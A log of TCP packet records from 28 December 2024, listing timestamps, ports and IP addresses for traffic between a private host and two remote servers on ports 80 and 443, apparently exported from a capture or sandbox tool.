Dec 28, 2024 09:56:54.893414974 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:54.893549919 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.893554926 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.893605947 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:54.893701077 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.893704891 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.893827915 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.893834114 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.894006968 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.894011974 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.894181967 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.894186020 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.894332886 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.894336939 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.894480944 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:54.894490957 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.894546986 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:54.894656897 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.894660950 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.894723892 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:54.895176888 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:54.895230055 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:55.005140066 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.005290031 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:55.012830019 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.012901068 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:55.012948990 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.013048887 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:55.013051033 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.013096094 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:55.013135910 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.013247013 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.013290882 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.013386965 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.013467073 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.013581038 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.013664007 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.013730049 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.013834000 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.013931990 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.014062881 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.014131069 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.014241934 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.014379978 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.014422894 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.014466047 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.014493942 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.014539957 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.014640093 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.014645100 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.014662981 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:55.014723063 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:55.014775991 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.014837027 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:55.014864922 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.014869928 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.014908075 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.014951944 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:55.015018940 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.015057087 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.015063047 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:55.015125990 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.015161991 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.015292883 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.015297890 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.015377045 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.015381098 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.015455008 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.015480042 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.015578032 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.015582085 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.015629053 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.015717983 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.015722990 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.015736103 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.015772104 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.015775919 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.015904903 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.015938997 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.016037941 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.016041994 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.016155005 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.016202927 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.016237020 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.016285896 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.016383886 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.016388893 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.016428947 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.016433001 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.125380993 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.125519991 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.132571936 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.132582903 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.132761955 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.132806063 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.132896900 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.132913113 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.133013010 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.133291006 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:55.133383989 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:55.134212971 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.134255886 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.134260893 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.134372950 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.134397030 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.134506941 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.134510994 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.134632111 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.134637117 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.134687901 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.134692907 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.134861946 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.134869099 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.135020018 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.135025024 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.135059118 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.135140896 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.135181904 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.135222912 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.135400057 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.135405064 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.135591984 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.135632038 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.135703087 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.135756969 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.135802031 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.135826111 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.135950089 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.135963917 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.136058092 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.136163950 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.136168957 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.136198997 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.136213064 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.136341095 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.136362076 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.136466980 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.136569023 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.136579037 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.136706114 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.138114929 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.138119936 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.139451027 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.139621019 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.139760017 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.139765024 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.139769077 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.139779091 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.139859915 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.139864922 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.139868975 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.139873028 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.139875889 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.139880896 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.140110016 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:55.140185118 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:55.252978086 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.253042936 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.253096104 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.253138065 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.253252029 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.253344059 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.253391027 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.253443003 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.253583908 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.253679037 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.253838062 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.253918886 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.253987074 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.254070997 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.254148960 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.254162073 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.254323006 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.254379034 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.254478931 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.254547119 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.254600048 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.254650116 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.254736900 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.254784107 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.254867077 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.254921913 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.254991055 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.255043030 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.255184889 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.255188942 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.255289078 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.255342960 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.255449057 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.255453110 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.255578995 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.255583048 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.255683899 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.255688906 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.255781889 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.255785942 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.255882025 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.255887032 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.255934954 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.255939007 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.256026030 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.256031990 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.256158113 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.256161928 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.256198883 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.256242990 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.256315947 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.256320000 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.256401062 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.256405115 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.256630898 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:55.259704113 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.259707928 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.259802103 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.259857893 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.259957075 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.259960890 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.260004997 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.260009050 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.260166883 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.260171890 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.260220051 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.260266066 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.260355949 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.260360003 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.260457993 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.260545969 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.260550022 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.260555029 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.260710001 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.260714054 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.260828018 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.260844946 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.260982990 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.260996103 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.261065006 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.261070013 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.261162996 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.261167049 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.261272907 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.261404991 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.261409998 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.261441946 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.261512041 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.261518002 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.261641026 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.261645079 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.261718035 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.261722088 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.261794090 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.261816025 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.261872053 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.261904001 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.261981964 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.261996031 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.262105942 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.262110949 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.262147903 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.262151957 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.262234926 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.262240887 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.262346983 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.262351036 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.262392998 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.262455940 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.376352072 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.376389980 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.376503944 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.376543045 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.376667023 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.376718044 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.376838923 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.376863956 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.376955032 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.376981020 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.377110958 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.377135992 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.377242088 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.377250910 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.377347946 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.377374887 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.377458096 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.377468109 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.377552986 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.377566099 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.377661943 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.377692938 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.378026962 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.378036976 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.378041029 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.378045082 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.378062010 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.378066063 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.378145933 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.378150940 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.378226042 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.378231049 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.378323078 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.378329039 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.378415108 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:55.378421068 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:57.466742992 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:57.466759920 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:57.466866016 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:57.467062950 CET	49714	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:57.586581945 CET	80	49714	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:57.665193081 CET	49717	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:57.784656048 CET	80	49717	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:57.784744024 CET	49717	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:57.784992933 CET	49717	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:57.904438972 CET	80	49717	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:58.260549068 CET	49718	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:56:58.260601044 CET	443	49718	104.21.2.51	192.168.2.12
Dec 28, 2024 09:56:58.260677099 CET	49718	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:56:58.263556004 CET	49718	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:56:58.263570070 CET	443	49718	104.21.2.51	192.168.2.12
Dec 28, 2024 09:56:59.185481071 CET	80	49717	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:59.185681105 CET	80	49717	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:59.185734987 CET	49717	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:59.185811043 CET	49717	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:59.486824036 CET	49717	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:59.493927002 CET	80	49717	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:59.517399073 CET	49720	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:59.566418886 CET	443	49718	104.21.2.51	192.168.2.12
Dec 28, 2024 09:56:59.566498995 CET	49718	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:56:59.600400925 CET	49718	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:56:59.600430965 CET	443	49718	104.21.2.51	192.168.2.12
Dec 28, 2024 09:56:59.600780010 CET	443	49718	104.21.2.51	192.168.2.12
Dec 28, 2024 09:56:59.606494904 CET	80	49717	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:59.606563091 CET	49717	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:59.636854887 CET	80	49720	194.87.58.92	192.168.2.12
Dec 28, 2024 09:56:59.636950970 CET	49720	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:59.643152952 CET	49718	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:56:59.649631977 CET	49720	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:56:59.679261923 CET	49718	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:56:59.679337025 CET	49718	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:56:59.679441929 CET	443	49718	104.21.2.51	192.168.2.12
Dec 28, 2024 09:56:59.769206047 CET	80	49720	194.87.58.92	192.168.2.12
Dec 28, 2024 09:57:00.389451981 CET	443	49718	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:00.389560938 CET	443	49718	104.21.2.51	192.168.2.12
